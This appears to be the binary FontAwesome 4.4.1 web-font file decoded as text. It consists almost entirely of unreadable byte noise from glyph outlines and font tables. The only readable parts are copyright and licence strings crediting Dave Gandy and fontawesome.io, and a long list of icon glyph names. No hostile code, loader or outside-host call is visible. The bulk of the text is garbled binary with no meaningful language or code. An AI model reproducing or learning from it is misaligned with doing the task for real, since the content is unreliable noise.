%&��	&	!'!	!%!!!!%"'.763!2�o���]�F������o�������oZ��Y��@:�@�!�!�g���������������f�/�/��I��62'"/"/"/"/"/"/"/7762762762762762762%"/77627&6?35!5!!3762762'"/"/"/"/"/"/%5#5!4�ZSS6SS4SS4SS4SS4SS4SS4�ZSS4SS4SS4SS4SS4SS4S�-4�ZSS4S@������4SS4�ZSS6SS4SS4SS4SS4SS4S@�����ZSSSSSSSSSSSSSS�ZSSSSSSSSSSSSSy�ZRRR@%:=
:+������:
=���RR�ZSSSSSSSSSSSSS���������Cv!/&'&#""'&#"	32>;232>7>76#!"&54>7'3&547&547>763226323@``����`
VFaaFV


$.


.$

��y��y�	.Q5Z���E$ ,l<l, $E���R?Y*��@���@�2	!#""#!	��y��y=r�na�@@(89*>�*%>>%*�>*98(QO�!���L\p'.'&67'#!##"327&+"&46;2!3'#"&7>;276;2+6267!"'&7&#"(6&#"#"'�D��g��OOG`n%�E������LL{�@&&�N�c,sU�&&�!Fre&&�s�����s���#�/,�������<=�
#�]�g��L�o�GkP�'��r-n&4&2�-ir&�&�?���o 
��������4_�����5OW! .54>762>7.'.7>+#!"&5#"&5463!2"&462�{�����{BtxG,:`9(0b��Կ�b0(9`:,GxtB��&@&�&@&K5�5K`�����?e==e?1O6#,
#$
,#6OO��&��&&�&�5KK���������?!"'&'!2673267!'.."!&54632>321
��4��q#F�""�8'g��o#-��#,"t�Yg��>�oP$$Po�>�	��Z�e�p#����)�R��0���+I@$$@I+����+332++"&=#"&=46;.7>76$  ������@����ᅪ*��r���������@��@�����������r���'/2+"&5".4>32!"&=463  �&@��~[���՛[[��u˜~���gr�������&�`����u՛[[���՛[~~@��r������=E32++"&=#"&=46;5&547&'&6;22676;2  >�����``@``�ٱ��?E,��,=?��r�������H�����@``@�GݧH`�j��j���r������BJ463!2+"&=32++"&=#"&=46;5.7676%#"&5   &@�~���``@``�� �v�X����r�������&���������@``@����+BF��`r������ks463!2+"&=32++"&=#"&=46;5&547'/.?'+"&5463!2+7>6 %#"&5   &@�~���``@``��~4e	
0
	io@& �jV	
0
	Z9�������r�������&���������@``@�G�ɞ5o
,
sp� &@k^
,
c8~~��`r�������8>KR_32++"&=!+"&=#"&=46;.767666'27&547&#"&'2#"�����@�@���'�Ϋ���'������sg��gs�����ww�@����sg��g����@����@���-ss��ʃl������9���9��������OO���r9���9��FP^l463!2+"&=$'.7>76%#"&=463!2+"&=%#"&54'>%&547.#"254&' &@�L?����CuГP	��v�Y�� &@�;"����������ޥ�5݇�����ޥ���5�`&����_��ڿg��w��BF�@&����J_	s���&��&�����?%x���������%x��JP\h463!2+"&='32++"&=#"&=46;5.7676632%#"&56'327&7&#"2#"� &@�L? ���ߺu�``@``��}
�ຒ�ɞ���������ue��eu�9����ue��e�&����_��"|N�@``@��"��"|a~���l����o����9���9��r9��@�9���;C2+"&5"/".4>327'&4?627!"&=463  �&@Ռ		.	
�N~[���՛[[��u˜N�		.	
����gr�������&�`֌
	.		�O��u՛[[���՛[~N�
	.		��@��r������9A'.'&675#"&=46;5"/&4?62"/32+  ��'��֪�����\
	.		�4�		.	
\���r������|��ݧ���憛��@�\		.	
��
	.		\�@��r�����~9A"/&4?!+"&=##"$7>763546;2!'&4?62  m��		-

���@���ݧ���憛��@&�

-		�@r������m4��

-		����ٮ*�������		-

��r������+"&5&54>2  ����@��[���՛[�r�����������dG�u՛[[���r������  ".4>2������r�[���՛[[���՛�r������5�՛[[���՛[[����$2#!37#546375&#"#3!"&5463�#22#�y��/Dz?s����!#22#�2#��#2S�88�	����2#V#2��L4>32#"&''&5467&5463232>54&#"#"'.K���g��&Rv�gD�
$*2%	+Z hP=DXZ@7^?1
۰��3O+�l��h4���`���M@8'�+c+RI2
�\�ZAhS�Q>B�>?S2Vhui/�����,R0+	ZRkm�z�+>Q2#"'.'&756763232322>4."7 #"'&546��n/9�b�LHG2E"D8_
p�dd���dxO�"2�xx��ê�_�lx�2X	
!+'5>-�pkW[C
�I
I@50�Od���dd��˥�Mhfx�����x^���ә�	�#'+/7!5!!5!4&"2!5!4&"24&"2!!!��� 8P88P�� 8P88P88P88P����������P88P8 ���P88P88P88P8� ������������+N &6 !2#!+"&5!"&=463!46;23!#!"&54>32267632#"_����>�@`

��
�
��

`
�
� L4Dg��y� 6Fe=O���O�U�4L��>����
�
��

`
�
`

��4L�2�y5eud_C(====`L4����3V &6 #"/#"/&54?'&54?6327632#!"&54>32 7632_����>���		�	
	��	
	�		��		�	
	��	
	�		��%%S��y� 6Fe=�J�%��>����	
	�		��		�	
	��	
	�		��		�	
	��%65%S�y5eud_C(zz.!6%$!2!!!46;24&"2!54&#!"�&���&�&@�Ԗ��V�@&&�@��&&�Ԗ�Ԗ@��&���3!!!	!5!'!53!!	#����7I�e�����eI7��CzC�l��@�����@������@�#2#!"&?.54$3264&"!@������մ���pp�p���������((��������p�pp����#+/2#!"&?.54$3264&"!264&"!@������մ���^^�^@����^^�^@���������((��������^�^^�����^�^^�����v(#"'%.54632	"'%	632U�/�@��k0�G��,�zD#[�k#�
/t�g��
F��
����Gz�����	#'#3!)
p�*�xe���0,\8�����T���#/DM�%2<GQ^lw�����&'&676676&'&7654&'&&546763"#"'3264&7.>&'%'.767&7667&766747665"'.'&767>3>7&'&'47.'.7676767&76767.'$73>?>67673>#6766666&'&6767.'"'276&67&54&&671&'6757>7&"2654&57>&>&'5#%67>76$7&?5.''&'&'#'""#''&'&'&'65.'&6767.'#%&''&'#2%676765&'&'&7&5&'6.7>�&5R4&5S9
W"-J�0(/�r
V"-J�0(.�)#"6&4pOPpp�c�|o}vQ�[�60X�Q��W1V�	
#5X		N"&
.
)
D>q J:102(z/=f��*4!>S5b<U$:I o<G*	,
&"O	X5
#!

��	R N#
C
83J*��R	!(D
#%37	�;$-.�
(,��覦�6ji
�	���"���)9
E�%����!B83
	j9�6/,	:QD')yX#�63V
��b�a	,
Ue��LPA@���*	̳�`Xx*&E
V36��%	B3%	B3XA	
#!.mU"A	
#!.mUB-#2+Jii�i�m-C<I(m��8qF/*)0�S
		
I
E5&+>!%
(!$p8~5..:5I

~��T�
4~9p# !
)& ?()5F	1	
	
� d%{v*�:
 @e
s|D�1d {�:�*dAA|oYk'&��<��tu��ut�&vHC�XXTR�;w��
��71™
	Z*&'
1	9?	.

$��Gv5k65P<�?8q=4�a	
SC"��1#<�/6B&!ML	�^;�6k5wF1<P�C	�;$"&462"&46232>.$.�`�aa��sa�``��Z9k����'9؋ӗa-*Gl|M�e_]`F&O������ܽ�sDD!/+�``�aa�``�a1<YK3(
 /8HQelA�Z3t_fQP<343J;T7Q�+?Kgw  $6&$  $&62+"5432+"&=.54  $;26=462;26=4& 4&#!"3!26)����߄��4R4߄��mlL�������r {jK#@#Q�a����^�����@���@���`&��&&�&�������߄��4R4�Ď������LlL�N� �@K5#:rr:#5K���^����a�a��``]��]``����&&�&&	/!3#4&#!"3!265##!"&5463!22�������@K5^B��B^^B@B^5K���� �@���5K�B^^B�B^^B�K	/!2##!"&5463!2#4&#!"3!265�5KK5^B��B^^B@B^���@��K5��5K�B^^B�B^^B�`� �@ 	/!2##!"&5463!2#4&#!"3!265�5KK5^B��B^^B@B^���@��K5��5K�B^^B�B^^B�`� �@ 	/!2##!"&5463!2#4&#!"3!265�5KK5^B��B^^B@B^���@��K5��5K�B^^B�B^^B�`� �@ 	+2##!"&5463!2#4&#!"3!265�5KK5^B��B^^B@B^���@�K5��5K�B^^B�B^^B�`� �@ �{#!&'#"'&547632m*���
�0���((�'(�$0K
��*�*��% 3#!3# '!#53 5#534!#53 6!3@����@@@��pp��@@@����@@pp@��`������� �����	�+/7;A#3!5!!3#!!5!35!355#%53#5!#35#!!!!!!!!����������������������������������������������������������������������
�	#'+/3?CGW#3!5!!35!!3#!!5!#!5!3535!355#%#3%!53#5!#35#!5##5!3!5!3!5	����������������������������������������������������������������������������������������������������������������!"&5463!2!"!�`(88(@(8�`(8�}2�2R �`8(@(88(�`8HR2�2���##6?6%!!!46#!"&5463!2x���� ��8�(�`(�(88(@(8�
���� (8��(`�(8(@(88��	�'ATd+5326+5323##"' %5&465./&76%4&'5>54&'"&#!!26#!"&5463!2�
��

���i�LCly5�)*H�celzzlec0h�b,,b�eIVB9@RB�9�J_�L4�4LL44L44%��2"��4��:I;p!q4b�b3p(P`t`P(�6EC.7B�I6�4LL44LL��	�.>$4&'6#".54$ 4.#!"3!2>#!"&5463!2Zj��b�jj[���wٝ]�>o��Ӱ�ٯ�*�-���oXL4�4LL44L'�)�꽽�)�J)���]��w����L���`��ֺ��۪e���4LL44LL�;4&#!"3!26#!"&5463!2#54&#!";#"&5463!2�
��

@
�^B��B^^B@B^���
��

��B^^B@B^`@

��
M��B^^B@B^^>��

��
�^B@B^^��5=Um	!	!!2#!"&=463!.'!"&=463!>2!2#264&"".54>762".54>762��������?(`��`(?��b|b��?B//B/�]�����]FrdhLhdrF�]�����]FrdhLhdrF@�@��@�(?��@@?(@9GG9@/B//B�aItB!!BtI�Ѷ�!!��ьItB!!BtI�Ѷ�!!��ь�-M32#!"&=46;7&#"&=463!2#>5!!4.'.46�ՠ��`�@`ՠ��`���M�sF�Fs�MM�sFFs�M����ojj�o��@@�jj�@@�<���!(!���!(!�-3?32#!"&=46;7&#"&=463!2+!!64.'#�ՠ��`�@`ՠ��`��	�	Dq�L�L�qD����ojj�o��@@�jj�@@B>=�C�����-3;32#!"&=46;7&#"&=463!2+!!6.'#�ՠ��`�@`ՠ��`��UVU96�g�g�6����ojj�o��@@�jj�@@β����**ɍ�-G32#!"&=46;7&#"&=463!2#>5!!&'.46�ՠ��`�@`ՠ��`���M�sF�Fs�M�k�k�����ojj�o��@@�jj�@@�<���!(!3��3!(!�9I2#!"&=4637>7.'!2#!"&=463��@b":1P4Y,++,Y4P1:"�":1P4Y,++,Y4P1:"b�@@��@7hVX@K-AA-K@XVh77hVX@K-AA-K@XVh7����Aj"#54&#"'54&#"3!26=476=4&#"#54&'&#"#54&'&'2632632#!"&5&=4632>3265K @0.B @0.B#6'&�&
l
@0.B 2'	.B A2TA9B;h" d�
mpP��Tl��L�c�_4.H�K5�]0CB.�S�0CB.�/#��'?&&)$�$)�0CB. }(AB.�z3M�2"61�d�39�L/PpuT(If�c�_�E�`1X"#4&"'&#"3!267654&"#4&"#4&26326#!"&'&5463246326�\B B\B�&@5K�&@�"6LB\B B\B ��sc�i�L}Q�P<m$��3�jN2�c�B.�p.BB.���3K5+"�3,"� �.BB.��.BB.���.�G=�c�i�(+�lOh7/DVj�"�c�=���&5Jb�#"'&=.547!"&46;'.54632!2327%.54&#"327%>%&#"!"3!754?27%>54&#!26=31��?>I��j��jq,J[�j.-t�j�lV��\���$B.R1?@B.��+?2`$�v5K-%��5KK5�.olRIS+6K5�̈$B\B 94E.&�ʀ�15uE&
�Ԗ�Pj��j�dX�U�GJ7!.B
�
P2�.B
�
%2@	�7�K5(B�@KjKj�?+f�UE,�5K~!1��.>F.��F,Q5*H��$b2#!"&=%!"&=463!7!"&'&=4634'&#!">3!!"3!32#!"3!23!26=n$<vpP��Pp���Pp�w�*�Rd�ApP�]��'@�A&
3@��&H-�[(8@
2�EB^&1
=&�&81����PppP��pP w���cOg Pp��c�
4& #.& &,,:8(�%^B &�
.�&&��At"#.#"%&#"3!267>7654&#"#654&#"#.!"'.54632&5467>32>3200?�t	='/@H@��"+4K8�"*�!4dtB/&>	c�@0&=	��	=_�JUD�29�i1"07
{x\�YS�gS�SW�]|t
ey�D0���&0D/
�����I4C+��) �t�.B3%�h#/B0&���&0��3|&p>i�+#]�
WsgQ�T\QglU
�]�#-39�oK_��3[_cg"'&#"3!2676=4&"#54&#"#54&#"#4&'2632632632#!"&'&5463246#!#!#�5K�)B4J�&@�#\8P8 @0.B J65K J6k�
cJ/4qG^�\hB�2<m$��3�iG;��     �K5����6L4+"�3p`b�)<8(=0CB.@Z7OK5`:7O��k�EW�^�tm��@Q7/DVi�##j�������������%4Ia�2#!"&5&546325462632"32654&"3267654&76;74&"#.#"2676=#"&'+53264&#!"3</�U�X�dj���jP��ԖEu�!7JG72P
�
B�%
�
B.!7�	@�A�f+?�jKjK@�B(5K,EU�H*5Q,F��.F>.��1!~K5y?��^\��Vl�j�t-.j�[J,qj��j��I7$��?1R.B�+��.B$`2?g�vEo.�5KK5��%-K��6+SIR[��&.E49 B\B$���5K�G#!+"&5!"&=463!2+"&'+"'+"'&5>;2>76;2Y
��
�
��

M	

�.�x	�-�
	N�	�


�	�
�u
��
,
u
�?

L�W���

���#	�	*:J4'&+326+"'#+"&5463!2  $6& $&6$ <!T{�BH4�	�›�&�>UbUI-����uu�,�uu�ڎ������LlL�AX!��J��m����f\�$
6u�����uu�,�K������LlL���-[k{276/&'&#"&5463276?6'.#"!276/&'&#"&5463276?6'.#"  $6&  $&6]�h-%Lb`J%E5
,5R-����h
-%Lb`J%E5
,5R-���'����uu�,�uu��lL�������/hR

dMLcN����hR
dMLcN����1u�����uu�,��������LlL�@��� 	'	7	'7	�����`��`H� �����`�`H� �!`��������`H� � ���`�`�`H���`��'%		7'	7'7	' $&6$ ���X�`��(W�:,�:��X�`��(WL�������LlL�X�`(W��:�B����X�`���(X�������LlL��
��	$%/9ES[�#"&54632$"&4624&"26$4&#"2%#"&462$#"&4632#"32&! 24>  !#"&'.'#"$547.'!6$32�7&'77'&7�7N77N�'q�qq�q�qPOrq��E�st�����ts��st���}�||�}�������uԙ[W��Q���~,>	n������P/RU P酛���n	>,m�����'77'&77N77N6^Orq�qq�qq�q�t��棣棣�(~|��|on[��usј^�~���33������pc8{y%cq����33dqpf��	L 54 "2654"'&'"/&477&'.67>326?><����
x
�������,

(-'s�IVC��VH�r'-(

$0@!BHp9[�%&!@0$u
��
������]\��\]��-$)!IH��V
D��
VHI!)$-#3���6>N"&462."&/.2?2?64/67>&  #!"&5463!2�]�]]�3
$;
&|�v;$
(CS�3�1	=�rM=	�4�TC(G���z�w�@w��w�w���]]�]��($-;,54�0=	�sL	=�45,;�����@w��w�w������(2#"$&546327654&#"	&#"AZ�������\@�/#�%E1/#����#.1E$�!�[A�����懇�@�@\��!�#21E!��6!E13"�|!��	gL&5&'.#4&5!67&'&'5676&'6452>3.'5����A5R��V[t,G'Q4}-��&�<C!l n?D_@Փ>r!�
��G;��>��!g�1�����2sV&2:#;��d=�*'�5E2/..F�D֕71$1>2�F!���&12,��@K�
r��#"&5462>%.#"'&#"#"'>54#".'7654&&5473254&/>7326/632327?&$  $6 $&6$ �!&"2&^	u��_��x��^�h
;J݃HJǭ
q�E
Dm!
M�
G?̯'%o�8
9U�������(F(�ߎ������LlL��&!&!SEm|�[��n{�[<ɪ
"p� C
Di%
(K�HCέp�C
B
m8	
@Kނ
H�F(���������������LlL���"*6%&6$	7&$5%%6'$2"&4}���x����3��n��QH������:dΏ���Xe�8�����z��'	������l�i���=!��7�����S�o�?v�������M '&7>>7'7>''>76.'6'���El:F�gr
*�t6�K3UZ8�3P)3^I%=9	)<�}J���k+C-Wd��	&U���-��TE+]��Qr-�<Q#0
�C+M8	3':$
_Q=+If5[ˮ&&SG�ZoM�k���ܬc�#7&#"327#"'&$&546$;#"'654'632ե›��fKYYKf�¥y�ͩ���䆎�L��1���hv�v��ƚw�wk��n�]��*��]�nlx��D��L�w�����~?T8b��b9SA}����+5?F!3267!#"'#"4767%!2$324&#"6327.'!.#"��۔c�2�8�Ψ����-\���?���@hU0KeFjTl�y�E3��aVs�z�.b��؏��W80��]T��Sts�<�h�O��_u7bBt���SbF/�o��|V]SHކ�J�������34&#!"3!26#!!2#!"&=463!5!"&5463!2
��

@
�^B� `��`� B^^B@B^ �

�@
�@B^�@@�^B�B^^����>3!"&546)2+6'.'.67>76%&��F8$.39_��0DD�40DD0���+*M7{L *="#
U<-M93#�D�@U8v�k�_Y	�[�hD00DD0��0D�ce-JF1BD����N&)@
/1 d��y%F��#"'&'&'&'&763276?6#"/#"/&54?'&763276"&'&'&5#&763567632#"'&7632654'&#"32>54'&#"'.5463!2#!3>7632#"'&'&#"'&767632yq������oq>*432fb������a
$�B?
	>B
BB
AA�.-QP���PR+	42
%<ci���ђ:6%h�HGhkG@n�`��I���Ȍ5
!m��(|.mzy�PQ-.	
	je����	
�����r=@@?pp�gVZE|fb6887a
%RB?
=B
ABBAJvniQP\\PRh cDS�`gΒ��23�geFGPHX�cCI��_ƍ��5"	
�n�*T.\PQip�
[*81
/
9@:��>t�%6#".'.>%6%&7>'.#*.'&676./&'.54>754'&#"%4>327676=
>���vwd"

�l����"3	/!,+	j2.|��%&
�(N&w���h>8X}x�c2"W<4<��,Z~�fd�aA�`FBIT;hmA<7QC1>[u])		u1�V(�k1S)
-�	0�B2*�%M;W(0S�[T�]I)	A 5%R7<vlR12I]O"��V/,b-8�/_��#3CGk2#!"&546;546;2!546;2%;2654&+";2654&+"!32++"&=#"&=46;546;24LL4��4LL4�^B@B^�^B@B^�@@�@@�����@��@L4�4LL44L`B^^B``B^^B``�� �� ��@@��@���#3W#!"&=463!2!!%4&+";26%4&+";26%#!"&546;546;2!546;232���@�����@@@@�L4��4LL4�^B@B^�^B@B^�4L�@@��� �� ��N�4LL44L`B^^B``B^^B`L��#'7Gk%"/"/&4?'&4?62762!!%4&+";26%4&+";26%#!"&546;546;2!546;232W.	
��
	.		��		.	
��
	.		��	� ����@@@@�L4��4LL4�^B@B^�^B@B^�4L�.		��		.	
��
	.		��		.	
��
��� �� ��N�4LL44L`B^^B``B^^B`L��(8\	"'&4?6262!!%4&+";26%4&+";26%#!"&546;546;2!546;232�

��		.	
��
	.	�`����@@@@�L4��4LL4�^B@B^�^B@B^�4L<�		 
	.		��		.	�:� �� ��N�4LL44L`B^^B``B^^B`L�2632632#!"&5463�&&&&��&&&���&���&��&&�&�$27+"&5  %264&#"26546B>&�&=��,��X�������q&&�@��X��,�LΒw�%��%;#!"&5463!546;2!2!+"&52#!"/&4?63!5!�

�(��&&@&�&(��&�&@&&��(�

�(�

�&&@&&@��&&�&�&�

�����#''%#"'&54676%6%%�������
�hh �@�` ���!�� ���!� ��
��
��
�
������
�#52#"&5476!2#"&5476!2#"'&546
� 
��
� 
���
�
�@�
�
�@�
��
�@

�
� 84&"2$4&"2$4&"2#"'&'&7>7.54$ �KjKKj�KjKKj�KjKKj��d�ne���4"%!������KjKKjKKjKKjKKjKKjK.���٫�8
!%00C'Z���'���.W"&462"&462"&462 6?32$6&#"'#"&'5&6&>7>7&54>$ �KjKKj�KjKKj�KjKKj�h��я�W.�{+9E=�c��Q�d�FK��1A
0)����LlL��jKKjKKjKKjKKjKKjK���p�J2`[Q?l&�����٫�C58.H(Y���ee���	�

			���Y'����w��(�����O��'��R���@$#"&#"'>7676327676#"�
�����b,XHUmM�.�U_t,7A3ge
z9@xS���a�Q�BLb�(�	����V���U�����
!!!�=�����=���w)��������@T!!77'7'#'#274.#"#32!5'.>537#"6=4>5'.465!��KkkK_5 5�� �#BH1��`L

I���&�v6��SF���!Sr99rS!``� /7K%s}H���XV
��P��V	e��		V�d/9Q[ $547.546326%>>32"&5%632264&#"64'&""&'&"2>&2654&#";2���P���3>tSU<�)tqH+>XX|W��h,�:USt��W|XX>=X*
)���)
+�^X^�|WX=>X�:_.2������//a:Ru?�
	
Q%-W|XW>J�(	�=u��>XX|WX�`

*((*


+2		2�X>=XW|E��03>$32!>7'&'&7!6./EU����noh��i����I\�������0<{ >ORD��ƚ�~�˕V�ƻ��o�R C3��7J6I`��Tb<�^M~M8O����	�	
5!#!"&!5!!52!5463	^B�@B^���`B^�^B `��B^^"�����^B��B^��	#D2+#!"$&6$3227%#"$$ %&$#"
7=D9�Kq�M�������L���w�9�'��q��n��H�����.Kt�f�w㿢p??p���Y9n6����
���LlL��k����T	၌��.������?p����㿢p? ��	7!'	!���\W�������\���d;����tZ�`_��O��;��k54+";2%54+";2!4&"!4;234;2354;2354;&5462!2#!32354;2354;2354;2�````��p�p��`�`�`� &4& ���`�`�`�����@PppP���pppppp�$&&$	��pppp��p	�j#"'&=!;5463!2#!"&=#".'.#!#"&463232>7>;>32#"&'#"!546���	��%. `@��` :,.',-���Xj��jX�h-,'.,: kb>PppP>bk .%Z �&�
�:k%$> $`��`6&L')59I"Tl�ԖlT"I95)'L&69Gp�pG9$ >$%k:��!+32&#!332 $&6$ ~O8��8���O�����������LlL�>pN
�����
i������LlL����	'':Ma4&'#"'.7654.#""'&#"3!267#!"&54676$32#"'.76'&>$#"'.7654'&676mD5)
z�{��6lP,@Kij��jOo�Ɏ���ȕ>>��[t��a)GG4?a�)
ll
>�;_-/
9GH{�z�yN@,K�ԕoN��繁������y��!
?hh>$
�D��"
>��â?$��	n"&5462'#".54>22654.'&'.54>32#"#*.5./"�~��~�s�!��m�{b6#	-SjR,l'(s�-6^]It�g))[��zxȁZ&+6,4$.X%%Dc*
&D~WL}]I0"

YYZ��vJ@N*CVTR3/A3$#/;'"/fR-,&2-"
7Zr�^N��a94Rji3.I+

&6W6>N%&60;96@7F6I3���+4&#!"3!26%4&#!"3!26 $$ ��������^����a�a`@��@����^����a�a�����'7  $ >. %"&546;2#!"&546;2#/�a����^�����(�����������������^����a�a����(������N@��@�����4&#!"3!26 $$ @��@����^����a�a`@����^����a�a�����'  $ >. 7"&5463!2#/�a����^�����(��������n@����^����a�a����(������N@���%=%#!"'&7!>3!26=!26=!2%"&54&""&546 �#��#]V�TV$KjK�KjK$��&4&�Ԗ&4&�>��9G��!�5KK5��5KK5�!��&&j��j�&&����#/;Im2+#!"&'#"&463>'.3%4&"26%4&"26%6.326#>;463!232#.+#!"&5#"�5KK5sH.�.Hs5KK5e# )4# %�&4&&4&�&4&&4&` #4) #%�~]�e�Z�&�&�Z�e�]E-�&��&�-EKjK�j.<<.�KjK��)�#)�`"@�&&�`&&�&&�`&&�)#�`)"�d�Xo&&oX�G�,8&&8!����O##!!2#!+"'&7#+"'&7!"'&?63!!"'&?63!6;236;2!2�@�@�8��@7

8��Q�
	N�Q�
	N��
	8G@��

8GQ�
	N�Q�
	N7
	�������8��8��H��H��k��%		".>2I�������2�0�]@��]��@o�����o@@o�����o㔕����a�22���]����]�p�^���|11|�9�9�|11|�(��%7'7'	'	7T���� d���lt��l)q��n�������luul�������)1$4&"24&"2 &6 +"&5476;2 &6 LhLLh�LLhLLhL����>�
�� �&
  �&�`����>�hLLhLLhLLhL�����>����&�&�����>��j�P_<��u>��u>����	��	����	~�pU����3U3��]������y�n�����2��@������
��������z���Z@�5�5
���z���ZZ����@���������,_���@������s���@	��@��(������@�����@��@-
�M�M�-�
�M�M�����@�����@@�
�-����`��b����
���$����6�4�8�"�"""""���@�D@���,,@� ���������	m��)@�@	 	' D9>dY*	w						�	��	��T										�@	f�	%RE	 		$!k(P��Bp�<$�H��<��T�f�T��	H	�	�
R
�
�,�Dx�
6
\
�D�L�X��*�(�2^�n��0|��b�X�*Z��� >n��@j��D��H�.��� 4 n � �!<!�!�!�"6"�"�#^#�#�$�$�%,%�&�&�'&'P'z'�(@(d(�(�))F)�)�*@*�,,~--�-�.,.�.�/"/�/�0F11|22z2�2�3f3�3�4V4�4�565�5�6P6�7V7�8�9 9n9�::T=b=�>>:>�>�?|@@>@xAVA�BB�B�B�CRC�D�E:FFxF�GVG�HH\H�H�H�II0IbI�I�I�J*JrJ�K`K�L@L�MM~NN\N�O.O�O�PZP�QQNQ�Q�R`S�U6U�V(VzV�V�W>W�W�X"XnX�X�X�YY^Y�Y�Z2ZdZ�[[�[�[�\l\�]]]]�]�^R^�_�``�`�a`a�bb:b�b�c�d$dfd�eele�f&fvf�g g�g�hBhph�h�i2iri�i�jBjzj�k kbk�ll\l�l�mm8mvm�nnbn�n�o8o�p
pbp�q<q�q�r�ss8s�tt�uu�vv�ww�x�y�y�zFz�z�{{v{�{�|�}(}^}�}�}�~$~N~�~�T�"�ƒD�����P���ԅJ���ކH�������<���ފ�v�ȋ*������􍴍�4���̏���*���Α�L�������p�t�p��B���� ����r�ڛN��P���������V�(���(����h���h��T���2���Ԧh�h�����X��x����b���J�����8���4������$���򱜲�z�4���2���Z�8�� ���`�ܼ^�̽^����¾��J��\����x���f�N���0İ���>�l��� Ǣ���"ɚ�ʔ�����|� ͜��VΤ��z�в�T���XҾ�&�`ӎӎӎ���,Ԩ��n���(�\֚���8�\�t��ۆ����`ܨ����Rݼ�<�hަ�:ߢ����f��*����Z����&���N��������T�����n���B���\�����$��6����*����&�
�2�t������������8�����&�p���H���L���B�����������������������'@�	^	^	t	.�	&�	$�	�	�	�		�	*�	<	�D	�0Z	��	�
�	��Copyright Dave Gandy 2015. All rights reserved.FontAwesomeRegularpyrs: FontAwesome: 2012FontAwesome RegularVersion 4.4.1 2015FontAwesomePlease refer to the Copyright section for the font trademark attribution notices.Fort AwesomeDave Gandyhttp://fontawesome.iohttp://fontawesome.io/license/Webfont 1.0Fri Nov 20 16:18:33 2015keeporionFont Squirrel�������	

��� !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopq�
rstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

" !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ab�cdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstu�uni00A0uni2000uni2001uni2002uni2003uni2004uni2005uni2006uni2007uni2008uni2009uni200Auni202Funi205Funi25FCglassmusicsearchenvelopeheartstar
star_emptyuserfilmth_largethth_listokremovezoom_inzoom_outoffsignalcogtrashhomefile_alttimeroaddownload_altdownloaduploadinboxplay_circlerepeatrefreshlist_altlockflag
headphones
volume_offvolume_down	volume_upqrcodebarcodetagtagsbookbookmarkprintcamerafontbolditalictext_height
text_width
align_leftalign_centeralign_right
align_justifylistindent_leftindent_rightfacetime_videopicturepencil
map_markeradjusttinteditsharecheckmove
step_backward
fast_backwardbackwardplaypausestopforwardfast_forwardstep_forwardejectchevron_left
chevron_right	plus_sign
minus_signremove_signok_sign
question_sign	info_sign
screenshot
remove_circle	ok_circle
ban_circle
arrow_leftarrow_rightarrow_up
arrow_down	share_altresize_fullresize_smallexclamation_signgiftleaffireeye_open	eye_closewarning_signplanecalendarrandomcommentmagnet
chevron_upchevron_downretweet
shopping_cartfolder_closefolder_openresize_verticalresize_horizontal	bar_charttwitter_sign
facebook_signcamera_retrokeycogscomments
thumbs_up_altthumbs_down_alt	star_halfheart_emptysignout
linkedin_signpushpin
external_linksignintrophygithub_sign
upload_altlemonphonecheck_emptybookmark_empty
phone_signtwitterfacebookgithubunlockcredit_cardrsshddbullhornbellcertificate
hand_right	hand_lefthand_up	hand_downcircle_arrow_leftcircle_arrow_rightcircle_arrow_upcircle_arrow_downglobewrenchtasksfilter	briefcase
fullscreengrouplinkcloudbeakercutcopy
paper_clipsave
sign_blankreorderulol
strikethrough	underlinetablemagictruck	pinterestpinterest_signgoogle_plus_signgoogle_plusmoney
caret_downcaret_up
caret_leftcaret_rightcolumnssort	sort_downsort_upenvelope_altlinkedinundolegal	dashboardcomment_altcomments_altboltsitemapumbrellapaste
light_bulbexchangecloud_downloadcloud_uploaduser_mdstethoscopesuitcasebell_altcoffeefood
file_text_altbuildinghospital	ambulancemedkitfighter_jetbeerh_signf0fedouble_angle_leftdouble_angle_rightdouble_angle_updouble_angle_down
angle_leftangle_rightangle_up
angle_downdesktoplaptoptabletmobile_phonecircle_blank
quote_leftquote_rightspinnercirclereply
github_altfolder_close_altfolder_open_alt
expand_altcollapse_altsmilefrownmehgamepadkeyboardflag_altflag_checkeredterminalcode	reply_allstar_half_emptylocation_arrowcrop	code_forkunlink_279exclamationsuperscript	subscript_283puzzle_piece
microphonemicrophone_offshieldcalendar_emptyfire_extinguisherrocketmaxcdnchevron_sign_leftchevron_sign_rightchevron_sign_upchevron_sign_downhtml5css3anchor
unlock_altbullseyeellipsis_horizontalellipsis_vertical_303	play_signticketminus_sign_altcheck_minuslevel_up
level_down
check_sign	edit_sign_312
share_signcompasscollapsecollapse_top_317eurgbpusdinrjpyrubkrwbtcfile	file_textsort_by_alphabet_329sort_by_attributessort_by_attributes_alt
sort_by_ordersort_by_order_alt_334_335youtube_signyoutubexing	xing_signyoutube_playdropbox
stackexchange	instagramflickradnf171bitbucket_signtumblrtumblr_signlong_arrow_down
long_arrow_uplong_arrow_leftlong_arrow_rightwindowsandroidlinuxdribbleskype
foursquaretrellofemalemalegittipsun_366archivebugvkweiborenren_372stack_exchange_374arrow_circle_alt_left_376dot_circle_alt_378vimeo_square_380
plus_square_o_382_383_384_385_386_387_388_389uniF1A0f1a1_392_393f1a4_395_396_397_398_399_400f1ab_402_403_404uniF1B1_406_407_408_409_410_411_412_413_414_415_416_417_418_419uniF1C0uniF1C1_422_423_424_425_426_427_428_429_430_431_432_433_434uniF1D0uniF1D1uniF1D2_438_439uniF1D5uniF1D6uniF1D7_443_444_445_446_447_448_449uniF1E0_451_452_453_454_455_456_457_458_459_460_461_462_463_464uniF1F0_466_467f1f3_469_470_471_472_473_474_475_476f1fc_478_479_480_481_482_483_484_485_486_487_488_489_490_491_492_493_494f210_496f212_498_499_500_501_502_503_504_505_506_507_508_509venus_511_512_513_514_515_516_517_518_519_520_521_522_523_524_525_526_527_528_529_530_531_532_533_534_535_536_537_538_539_540_541_542_543_544_545_546_547_548_549_550_551_552_553_554_555_556_557_558_559_560_561_562_563_564_565_566_567_568_569f260f261_572f263_574_575_576_577_578_579_580_581_582_583_584_585_586_587_588_589_590_591_592_593_594_595_596_597_598f27euniF280uniF281_602_60